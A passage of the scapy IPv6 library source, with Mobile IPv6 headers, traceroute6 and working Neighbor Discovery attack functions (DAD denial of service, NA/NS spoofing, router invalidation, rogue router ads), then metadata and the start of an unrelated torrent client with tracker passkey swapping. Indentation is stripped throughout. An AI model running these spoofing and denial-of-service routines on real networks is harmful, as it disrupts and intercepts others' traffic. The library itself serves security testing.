fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 3, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("index", None),
StrFixedLenField("cookie", "\x00"*8, 8),
StrFixedLenField("token", "\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
    def answers(self, other):
if (isinstance(other, MIP6MH_HoTI) and
self.cookie == other.cookie):
return 1
return 0
class MIP6MH_CoT(MIP6MH_HoT):
name = "IPv6 Mobility Header - Care-of Test"
mhtype = 4
def hashret(self):
return self.cookie
    def answers(self, other):
if (isinstance(other, MIP6MH_CoTI) and
self.cookie == other.cookie):
return 1
return 0
class LifetimeField(ShortField):
def i2repr(self, pkt, x):
return "%d sec" % (4*x)
class MIP6MH_BU(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Update"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 5, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
XShortField("seq", None), # TODO: ShortNonceField
FlagsField("flags", "KHA", 7, "PRMKLHA"),
XBitField("reserved", 0, 9),
LifetimeField("mhtime", 3), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len - 4) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return "\x00\x08\x09"
def answers(self, other):
if isinstance(other, MIP6MH_BRR):
return 1
return 0
class MIP6MH_BA(_MobilityHeader):
name = "IPv6 Mobility Header - Binding ACK"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 6, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ByteEnumField("status", 0, bastatus),
FlagsField("flags", "K", 3, "PRK"),
XBitField("res2", None, 5),
XShortField("seq", None), # TODO: ShortNonceField
XShortField("mhtime", 0), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len-4) ]
overload_fields = { IPv6: { "nh": 135 }}
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return "\x00\x08\x09"
def answers(self, other):
if (isinstance(other, MIP6MH_BU) and
other.mhtype == 5 and
self.mhtype == 6 and
            other.flags & 0x40 and   # 'A' (Ack requested) flag is set
self.seq == other.seq):
return 1
return 0
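# Example (hypothetical addresses) of matching a BU with its BA through
# answers(); the default BU flags ("KHA") include the Ack bit, so the BA
# below is accepted:
#   >>> bu = IPv6(src="2001:db8::2", dst="2001:db8::1")/MIP6MH_BU(seq=42)
#   >>> ba = IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_BA(seq=42)
#   >>> ba[MIP6MH_BA].answers(bu[MIP6MH_BU])
#   1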
_bestatus = { 1: 'Unknown binding for Home Address destination option',
2: 'Unrecognized MH Type value' }
# TODO: match Binding Error to its stimulus
class MIP6MH_BE(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Error"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 7, mhtypes),
ByteField("res", 0),
XShortField("cksum", None),
ByteEnumField("status", 0, _bestatus),
ByteField("reserved", 0),
IP6Field("ha", "::"),
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 }}
_mip6_mhtype2cls = { 0: MIP6MH_BRR,
1: MIP6MH_HoTI,
2: MIP6MH_CoTI,
3: MIP6MH_HoT,
4: MIP6MH_CoT,
5: MIP6MH_BU,
6: MIP6MH_BA,
7: MIP6MH_BE }
#############################################################################
#############################################################################
### Traceroute6 ###
#############################################################################
#############################################################################
class AS_resolver6(AS_resolver_riswhois):
def _resolve_one(self, ip):
"""
overloaded version to provide a Whois resolution on the
embedded IPv4 address if the address is 6to4 or Teredo.
Otherwise, the native IPv6 address is passed.
"""
if in6_isaddr6to4(ip): # for 6to4, use embedded @
tmp = inet_pton(socket.AF_INET6, ip)
addr = inet_ntop(socket.AF_INET, tmp[2:6])
elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
addr = teredoAddrExtractInfo(ip)[2]
else:
addr = ip
_, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
return ip,asn,desc
class TracerouteResult6(TracerouteResult):
__slots__ = []
def show(self):
return self.make_table(lambda (s,r): (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 !
s.hlim,
r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+
"{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+
"{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+
"{ICMPv6EchoReply:%ir,type%}")))
def get_trace(self):
trace = {}
for s,r in self.res:
if IPv6 not in s:
continue
d = s[IPv6].dst
if d not in trace:
trace[d] = {}
t = not (ICMPv6TimeExceeded in r or
ICMPv6DestUnreach in r or
ICMPv6PacketTooBig in r or
ICMPv6ParamProblem in r)
trace[d][s[IPv6].hlim] = r[IPv6].src, t
for k in trace.itervalues():
try:
                m = min(x for x, y in k.iteritems() if y[1])
except ValueError:
continue
for l in k.keys(): # use .keys(): k is modified in the loop
if l > m:
del k[l]
return trace
def graph(self, ASres=AS_resolver6(), **kargs):
TracerouteResult.graph(self, ASres=ASres, **kargs)
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
l4 = None, timeout=2, verbose=None, **kargs):
"""
Instant TCP traceroute using IPv6 :
traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
"""
if verbose is None:
verbose = conf.verb
if l4 is None:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport),
timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs)
else:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4,
timeout=timeout, verbose=verbose, **kargs)
a = TracerouteResult6(a.res)
if verbose:
a.display()
return a,b
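# Hypothetical usage (requires IPv6 connectivity and raw socket privileges):
#   >>> res, unans = traceroute6("www.example.com", dport=80, maxttl=20)  # doctest: +SKIP
# The returned TracerouteResult6 can then be post-processed, e.g. with
# res.get_trace() or res.graph().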
#############################################################################
#############################################################################
### Sockets ###
#############################################################################
#############################################################################
class L3RawSocket6(L3RawSocket):
def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):
L3RawSocket.__init__(self, type, filter, iface, promisc)
# NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)
self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
def IPv6inIP(dst='203.178.135.36', src=None):
_IPv6inIP.dst = dst
_IPv6inIP.src = src
if not conf.L3socket == _IPv6inIP:
_IPv6inIP.cls = conf.L3socket
else:
del(conf.L3socket)
return _IPv6inIP
class _IPv6inIP(SuperSocket):
dst = '127.0.0.1'
src = None
cls = None
def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):
SuperSocket.__init__(self, family, type, proto)
self.worker = self.cls(**args)
def set(self, dst, src=None):
_IPv6inIP.src = src
_IPv6inIP.dst = dst
def nonblock_recv(self):
p = self.worker.nonblock_recv()
return self._recv(p)
def recv(self, x):
p = self.worker.recv(x)
return self._recv(p, x)
def _recv(self, p, x=MTU):
if p is None:
return p
elif isinstance(p, IP):
# TODO: verify checksum
if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
if isinstance(p.payload, IPv6):
return p.payload
return p
def send(self, x):
return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x)
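# Hypothetical usage of the IPv6-in-IPv4 tunnelling socket above: register
# it as the L3 socket, so that every emitted IPv6 packet is encapsulated
# towards the configured IPv4 endpoint:
#   >>> conf.L3socket = IPv6inIP(dst="192.0.2.1")   # doctest: +SKIP
#   >>> send(IPv6(dst="2001:db8::1")/ICMPv6EchoRequest())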
#############################################################################
#############################################################################
### Neighbor Discovery Protocol Attacks ###
#############################################################################
#############################################################################
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
tgt_filter=None, reply_mac=None):
"""
Internal generic helper accepting a specific callback as first argument,
for NS or NA reply. See the two specific functions below.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
# Get and compare the MAC address
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must be the unspecified address
if req[IPv6].src != "::":
return 0
# Check destination is the link-local solicited-node multicast
# address associated with target address in received NS
tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
received_snma = socket.inet_pton(socket.AF_INET6, req[IPv6].dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
return 0
return 1
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, iface),
iface=iface)
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
    Perform the DAD DoS attack using NS messages, as described in section
    4.1.3 of RFC 3756. This is done by listening to incoming NS messages
    sent from the unspecified address and sending an NS reply for the
    target address, leading the peer to believe that another node is also
    performing DAD for that address.
By default, the fake NS sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the unspecified address (::).
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
"""
def ns_reply_callback(req, reply_mac, iface):
"""
        Callback that replies to an NS by sending a similar NS
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac)/IPv6(src="::", dst=dst)/ICMPv6ND_NS(tgt=tgt)
sendp(rep, iface=iface, verbose=0)
print "Reply NS for target address %s (received from %s)" % (tgt, mac)
_NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
    Perform the DAD DoS attack using NA messages, as described in section
    4.1.3 of RFC 3756. This is done by listening to incoming NS messages
    *sent from the unspecified address* and sending an NA reply for the
    target address, leading the peer to believe that another node is also
    performing DAD for that address.
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address found in received NS.
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
"""
def na_reply_callback(req, reply_mac, iface):
"""
        Callback that replies to an NS with an NA
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac)/IPv6(src=tgt, dst=dst)
rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1)
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print "Reply NA for target address %s (received from %s)" % (tgt, mac)
_NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None, router=False):
"""
    The main purpose of this function is to send fake Neighbor Advertisement
    messages to a victim. As the emission of unsolicited Neighbor Advertisements
    is pretty pointless (from an attacker standpoint) because it will not
    lead to a modification of a victim's neighbor cache, the function sends
    advertisements in response to received NS (NS sent as part of DAD,
    i.e. with an unspecified address as source, are not considered).
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address
- as IPv6 destination address: the source IPv6 address of received NS
message.
- the mac address of the interface as source (or reply_mac, see below).
    - the source mac address of the received NS as destination mac address
      of the emitted NA.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
filled with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
    router: by default (False), the 'R' flag in the NA used for the reply
        is not set. If the parameter is set to True, the 'R' flag in the
        NA is set, advertising us as a router.
Please, keep the following in mind when using the function: for obvious
reasons (kernel space vs. Python speed), when the target of the address
resolution is on the link, the sender of the NS receives 2 NA messages
in a row, the valid one and our fake one. The second one will overwrite
the information provided by the first one, i.e. the natural latency of
Scapy helps here.
    In practice, on a common Ethernet link, the emission of the NA from the
    genuine target (kernel stack) usually occurs in the same millisecond as
    the receipt of the NS. The NA generated by Scapy6 will usually come
    some 20+ ms later. On a usual testbed, for instance, this difference is
    sufficient to have the first data packet sent from the victim to the
    destination before it even receives our fake NA.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must NOT be the unspecified address
if req[IPv6].src == "::":
return 0
tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
dst = req[IPv6].dst
if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
# If this is a real address resolution NS, then the destination
# address of the packet is the link-local solicited node multicast
# address associated with the target of the NS.
# Otherwise, the NS is a NUD related one, i.e. the peer is
# unicasting the NS to check the target is still alive (L2
# information is still in its cache and it is verified)
received_snma = socket.inet_pton(socket.AF_INET6, dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
print "solicited node multicast @ does not match target @!"
return 0
return 1
def reply_callback(req, reply_mac, router, iface):
"""
        Callback that replies to an NS with a spoofed NA
"""
# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
# send it back.
mac = req[Ether].src
pkt = req[IPv6]
src = pkt.src
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac, dst=mac)/IPv6(src=tgt, dst=src)
rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # target from the NS
# "If the solicitation IP Destination Address is not a multicast
# address, the Target Link-Layer Address option MAY be omitted"
# Given our purpose, we always include it.
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print "Reply NA for target address %s (received from %s)" % (tgt, mac)
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
router = (router and 1) or 0 # Value of the R flags in NA
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, router, iface),
iface=iface)
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
dst=None, src_mac=None, dst_mac=None, loop=True,
inter=1, iface=None):
"""
    The main purpose of this function is to send fake Neighbor Solicitation
    messages to a victim, in order to either create a new entry in its neighbor
    cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
    that a node SHOULD create the entry or update an existing one (if it is not
    currently performing DAD for the target of the NS). The entry's reachability
    state is set to STALE.
    The two main parameters of the function are the source link-layer address
    (carried by the Source Link-Layer Address option in the NS) and the
    source address of the packet.
    Unlike some other NDP_Attack_* functions, this one is not based on a
    stimulus/response model. When called, it sends the same NS packet in a
    loop every second (the default).
Following arguments can be used to change the format of the packets:
src_lladdr: the MAC address used in the Source Link-Layer Address option
included in the NS packet. This is the address that the peer should
associate in its neighbor cache with the IPv6 source address of the
packet. If None is provided, the mac address of the interface is
used.
src: the IPv6 address used as source of the packet. If None is provided,
an address associated with the emitting interface will be used
(based on the destination address of the packet).
target: the target address of the NS packet. If no value is provided,
a dummy address (2001:db8::1) is used. The value of the target
has a direct impact on the destination address of the packet if it
is not overridden. By default, the solicited-node multicast address
associated with the target is used as destination address of the
packet. Consider specifying a specific destination address if you
intend to use a target address different than the one of the victim.
dst: The destination address of the NS. By default, the solicited node
multicast address associated with the target address (see previous
parameter) is used if no specific value is provided. The victim
is not expected to check the destination address of the packet,
so using a multicast address like ff02::1 should work if you want
the attack to target all hosts on the link. On the contrary, if
you want to be more stealth, you should provide the target address
for this parameter in order for the packet to be sent only to the
victim.
    src_mac: the MAC address used as source of the packet. By default, this
        is the address of the interface. If you want to be more stealth,
        feel free to use something else. Note that this address is not the
        one that the victim will use to populate its neighbor cache.
dst_mac: The MAC address used as destination address of the packet. If
the IPv6 destination address is multicast (all-nodes, solicited
node, ...), it will be computed. If the destination address is
unicast, a neighbor solicitation will be performed to get the
associated address. If you want the attack to be stealth, you
can provide the MAC address using this parameter.
loop: By default, this parameter is True, indicating that NS packets
will be sent in loop, separated by 'inter' seconds (see below).
When set to False, a single packet is sent.
inter: When loop parameter is True (the default), this parameter provides
the interval in seconds used for sending NS packets.
iface: to force the sending interface.
"""
if not iface:
iface = conf.iface
# Use provided MAC address as source link-layer address option
# or the MAC address of the interface if none is provided.
if not src_lladdr:
src_lladdr = get_if_hwaddr(iface)
# Prepare packets parameters
ether_params = {}
if src_mac:
ether_params["src"] = src_mac
if dst_mac:
ether_params["dst"] = dst_mac
ipv6_params = {}
if src:
ipv6_params["src"] = src
if dst:
ipv6_params["dst"] = dst
else:
# Compute the solicited-node multicast address
# associated with the target address.
tmp = inet_ntop(socket.AF_INET6,
in6_getnsma(inet_pton(socket.AF_INET6, target)))
ipv6_params["dst"] = tmp
pkt = Ether(**ether_params)
pkt /= IPv6(**ipv6_params)
pkt /= ICMPv6ND_NS(tgt=target)
pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
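# Hypothetical lab usage (only on networks you control): make 2001:db8::1
# associate the spoofed source address with a chosen MAC in its neighbor
# cache:
#   >>> NDP_Attack_NS_Spoofing(src_lladdr="00:11:22:33:44:55",  # doctest: +SKIP
#   ...                        src="2001:db8::66", dst="2001:db8::1",
#   ...                        iface="eth0")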
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
ip_src_filter=None, reply_mac=None,
tgt_mac=None):
"""
The purpose of the function is to monitor incoming RA messages
sent by default routers (RA with a non-zero Router Lifetime values)
and invalidate them by immediately replying with fake RA messages
advertising a zero Router Lifetime value.
The result on receivers is that the router is immediately invalidated,
i.e. the associated entry is discarded from the default router list
and destination cache is updated to reflect the change.
By default, the function considers all RA messages with a non-zero
Router Lifetime value but provides configuration knobs to allow
filtering RA sent by specific routers (Ethernet source address).
With regard to emission, the multicast all-nodes address is used
by default but a specific target can be used, in order for the DoS to
apply only to a specific host.
More precisely, following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RA messages received from this source will trigger replies.
If other default routers advertised their presence on the link,
their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific mac address.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RA messages received from this source address will trigger
replies. If other default routers advertised their presence on the
link, their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific IPv6 source
address.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
tgt_mac: allow limiting the effect of the DoS to a specific host,
by sending the "invalidating RA" only to its mac address.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
# Check if this is an advertisement for a Default Router
# by looking at Router Lifetime value
if req[ICMPv6ND_RA].routerlifetime == 0:
return 0
return 1
def ra_reply_callback(req, reply_mac, tgt_mac, iface):
"""
Callback that sends an RA with a 0 lifetime
"""
# Let's build a reply and send it
src = req[IPv6].src
# Prepare packets parameters
ether_params = {}
if reply_mac:
ether_params["src"] = reply_mac
if tgt_mac:
ether_params["dst"] = tgt_mac
# Basis of fake RA (high pref, zero lifetime)
rep = Ether(**ether_params)/IPv6(src=src, dst="ff02::1")
rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
        # Add a PIO taken from the request ...
tmp = req
while ICMPv6NDOptPrefixInfo in tmp:
pio = tmp[ICMPv6NDOptPrefixInfo]
tmp = pio.payload
del(pio.payload)
rep /= pio
# ... and source link layer address option
if ICMPv6NDOptSrcLLAddr in req:
mac = req[ICMPv6NDOptSrcLLAddr].lladdr
else:
mac = req[Ether].src
rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
sendp(rep, iface=iface, verbose=0)
print "Fake RA sent with source address %s" % src
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
iface=iface)
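# Hypothetical lab usage: invalidate the default router advertised from a
# given MAC address, targeting a single victim only:
#   >>> NDP_Attack_Kill_Default_Router(iface="eth0",  # doctest: +SKIP
#   ...                                mac_src_filter="00:13:72:8c:b5:69",
#   ...                                tgt_mac="00:11:22:33:44:55")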
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
ip_src_filter=None):
"""
    The purpose of this function is to send the provided RA message at layer 2
    (i.e. providing a packet starting with IPv6 will not work) in response
    to received RS messages. In the end, the function is a simple wrapper
    around sendp() that monitors the link for RS messages.
It is probably better explained with an example:
>>> ra = Ether()/IPv6()/ICMPv6ND_RA()
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
>>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
>>> NDP_Attack_Fake_Router(ra, iface="eth0")
Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
...
Following arguments can be used to change the behavior:
ra: the RA message to send in response to received RS message.
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If none is provided, conf.iface is
used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RS messages received from this source will trigger a reply.
        Note that no changes to the provided RA are done, which implies that
        if you intend to target only the source of the RS using this option,
        you will have to set the Ethernet destination address to the same
        value in your RA.
        The default value for this parameter is None: no filtering on the
        source of RS is done.
    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
        on. Only RS messages received from this source address will trigger
        replies. The same comment as for the previous argument applies: if
        you use the option, you will probably want to set a specific Ethernet
        destination address in the RA.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
return 1
def ra_reply_callback(req, iface):
"""
Callback that sends an RA in reply to an RS
"""
src = req[IPv6].src
sendp(ra, iface=iface, verbose=0)
print "Fake RA sent in response to RS from %s" % src
if not iface:
iface = conf.iface
sniff_filter = "icmp6"
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, iface),
iface=iface)
#############################################################################
#############################################################################
### Layers binding ###
#############################################################################
#############################################################################
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l2types.register(31, IPv6)
bind_layers(Ether, IPv6, type = 0x86dd )
bind_layers(CookedLinux, IPv6, proto = 0x86dd )
bind_layers(IPerror6, TCPerror, nh = socket.IPPROTO_TCP )
bind_layers(IPerror6, UDPerror, nh = socket.IPPROTO_UDP )
bind_layers(IPv6, TCP, nh = socket.IPPROTO_TCP )
bind_layers(IPv6, UDP, nh = socket.IPPROTO_UDP )
bind_layers(IP, IPv6, proto = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IPv6, nh = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IP, nh = socket.IPPROTO_IPIP )
|
AmedeoSapio/scapy
|
scapy/layers/inet6.py
|
Python
|
gpl-2.0
| 144,648
|
#!/usr/bin/python2.7
from threading import Thread, activeCount
import libtorrent as lt
from time import sleep, time
import sys
import os
sys.dont_write_bytecode = True
state_str = ['queued', 'checking', 'downloading metadata', 'downloading',
'finished', 'seeding', 'allocating', 'checking fastresume']
#
# TORRENT THREAD
#
class TORRENTTHREAD(Thread):
toStop = False
#
# Init
    # param: torrentFile: string
#
def __init__(self, torrentFile):
super(TORRENTTHREAD, self).__init__()
self.output = os.path.dirname(torrentFile)
self.torrentFile = torrentFile
self.info = lt.torrent_info(torrentFile)
# GUI
self.EditGui = None
self.ItemGui = None
self.PrintStatus = False
# Replace tracker parameters
self.replacePasskey = False
self.userPasskey = ''
self.leechPasskey = ''
# Limits
self.downloadLimit = 9000000
self.uploadLimit = 500000
#
# Print a message
# param: message: string
#
def Print(self, message):
if self.EditGui:
self.EditGui(self.ItemGui, message)
if self.PrintStatus:
print self.info.name() + ' - ' + message
self.PrintStatus = False
#
# Get Torrent name
#
def GetTorrentName(self):
return self.info.name()
#
# Print torrent status
#
def GetStatus(self):
self.PrintStatus = True
#
# Set Gui Function
# param: EditGui, type: Function
#
def SetEditGui(self, EditGui):
self.EditGui = EditGui
#
# Set Edit Gui item
# param: item, type: string
#
def SetItem(self, item):
self.ItemGui = item
#
# Set download limit
# param: downloadLimit, type: int
#
def SetDownloadLimit(self, downloadLimit):
self.downloadLimit = downloadLimit
#
# Set upload limit
    # param: uploadLimit, type: int
#
def SetUploadLimit(self, uploadLimit):
self.uploadLimit = uploadLimit
#
# Set output path
# param: output, type: string
#
def SetOutput(self, output):
self.output = output
#
    # Set undesirable and new trackers
# param userPasskey, type: string
# param leechPasskey, type: string
#
def SetPasskey(self, userPasskey, leechPasskey):
if userPasskey and leechPasskey:
self.userPasskey = userPasskey
self.leechPasskey = leechPasskey
self.replacePasskey = True
#
# Start
#
def run(self):
# New Session
# fingerprint = lt.fingerprint("AZ", 3, 0, 5, 0)
# settings = lt.session_settings()
# settings.user_agent = "Azerus 3.0.5.0"
